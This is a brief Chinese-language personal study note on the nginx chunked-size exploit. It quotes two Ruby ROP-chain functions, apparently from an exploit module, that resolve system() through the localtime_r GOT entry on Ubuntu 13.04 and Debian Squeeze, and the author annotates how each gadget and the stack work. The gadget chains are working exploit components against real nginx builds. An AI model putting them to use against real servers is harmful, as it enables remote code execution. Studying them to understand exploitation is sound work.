nginx chunked size exploits笔记

最近动手调试太少，很多东西都忘记了，记一下笔记

def dereference_got_ubuntu_1304

    chain = [

      0x08094129,        # pop esi; ret

      0x080c5090,        # GOT for localtime_r

      0x0804c415,        # pop ecx ; add al, 29h ; ret

      0x001a4b00,        # Offset to system

      0x080c360a,        # add ecx, [esi] ; adc al, 41h ; ret

      0x08076f63,        # push ecx ; add al, 39h ; ret

      0x41414141,        # Garbage return address 卡在这行，上面指令执行时，会在0x41414141 push system 绝对地址，ret时进入 system函数调用，32位函数调用stack: func;ret addr;parameters...

      target['Writable'], # ptr to .data where contents have been stored

    ]

    return chain.pack('V*')

  end

defdereference_got_debian_squeeze

chain=[

0x0804ab34,#pop edi ; pop ebp ; ret

0x080B4128-

0x5d5b14c4,#0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment

0x41414141,#padding (ebp)

0x08093c75,#mov ebx, edi ; dec ecx ; ret

0x08067330,#pop eax # ret

0xfffb0c80,#offset

0x08078a46,#add eax, [ebx+0x5d5b14c4] # ret

0x0804a3af,#call eax # system  ....call asm :1.push eip,2,EIP= eax，此时stack为  old eip  target['Writable']，和函数调用stack一样。

target['Writable']#ptr to .data where contents have been stored

    ]

returnchain.pack("V*")

end